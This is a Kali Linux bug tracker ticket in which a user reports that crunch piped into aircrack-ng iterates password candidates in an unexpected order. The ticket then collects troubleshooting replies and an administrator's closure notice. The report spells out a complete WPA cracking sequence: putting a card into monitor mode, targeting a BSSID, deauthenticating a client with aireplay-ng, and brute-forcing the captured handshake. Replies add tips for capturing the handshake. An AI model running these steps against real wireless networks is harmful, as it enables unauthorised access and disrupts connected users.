View Issue Details

IDProjectCategoryView StatusLast Update
0006821Kali LinuxKali Package Bugpublic2021-06-02 10:12
Reporterzero_dash Assigned To 
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionopen 
Product Version2020.3 
Summary0006821: i have a problem when i try to crack a passwd with crunch
Description

i have a problem with aircrack-ng when i want to crack a wifi passwd without a wordlist using crunch and
when i start the password crack it starts from the right to the left and it happened to me only in this version 2020.3
i watched multiple vids its all ended up with the same problem
this is the cmds i used:
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c (channel) -w (capture_file_name) --bssid (mac-id of target) wlan0mon
aireplay-ng -0 5 -a (mac-id) -c (mac-id of device) wlan0mon
crunch 8 8 -t %%%%%%%% 1234567890 | aircrack-ng -w - (capture_file_name-01.cap) -e (name_of_wifi)

special thanks to abc_user_nothing_special for helping me with my panel problem

Activities

dQw4w9WgXcQ

dQw4w9WgXcQ

2020-11-04 17:11

reporter   ~0013638

Okay first off I haven't tried this yet for myself so I can't be 100% sure with my answer but I will test this out soon but in the meantime I would like to ask some questions.

Have you made sure there are no typos when executing the given commands along with your arguments and have you read through manuals and understand how the commands and arguments operate etc?

Second question

Are there any form of error output messages that come up? Anything at all

Third question

Have you done a troubleshoot checklist and check for stuff like chipset compatibility because I noticed you were using a deauthenication attack via "aireplay-ng -0 5" and maybe try other things out like maybe set the value more than 5 just until you get a PMKID while you are monitoring with "airodump-ng" and also depends what is your range to the target performing this attack and you might want to have a good antenna because that could help out as well and if your computer is up for a task like this because I know the phrase "if it's new it goes fast but if it's old then it will be slow".

Again I can't be 100% sure with my statement and I could be wrong just until I get everything up and running ready for testing and trouble shooting.

dQw4w9WgXcQ

dQw4w9WgXcQ

2020-11-04 23:31

reporter   ~0013642

I will perform a shot in the dark question here but is it possible that your problem having is that there is "No such file or directory" kind of thing?

dQw4w9WgXcQ

dQw4w9WgXcQ

2020-11-05 02:34

reporter   ~0013643

Okay so I did everything you provided

When monitoring the airodump-ng data did you get any EAPOL notes.

dQw4w9WgXcQ

dQw4w9WgXcQ

2020-11-05 02:47

reporter   ~0013644

Also does you wifi chipset support injection?

Are you within range of your target when performing a deauth attack?

Try sending more deauth packets until you get a EAPOL/handshake notes.

Then try crunch again.

Because I don't seem to anything irregular on my end because everything works okay.

dQw4w9WgXcQ

dQw4w9WgXcQ

2020-11-05 02:55

reporter   ~0013645

Plus have you made sure you have sufficient packets collected

g0tmi1k

g0tmi1k

2021-06-02 10:12

administrator   ~0014660

This report has been filed against an old version of Kali. We will be closing this ticket due to inactivity.
Please could you see if you are able to replicate this issue with the latest version of Kali Linux (https://www.kali.org/get-kali/)?
If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information to the issue you are facing, and also give information about your setup?
For more information, please read: https://kali.training/topic/filing-a-good-bug-report/

Issue History

Date Modified Username Field Change
2020-11-04 14:28 zero_dash New Issue
2020-11-04 17:11 dQw4w9WgXcQ Note Added: 0013638
2020-11-04 23:31 dQw4w9WgXcQ Note Added: 0013642
2020-11-05 02:34 dQw4w9WgXcQ Note Added: 0013643
2020-11-05 02:47 dQw4w9WgXcQ Note Added: 0013644
2020-11-05 02:55 dQw4w9WgXcQ Note Added: 0013645
2021-06-02 10:12 g0tmi1k Note Added: 0014660
2021-06-02 10:12 g0tmi1k Status new => closed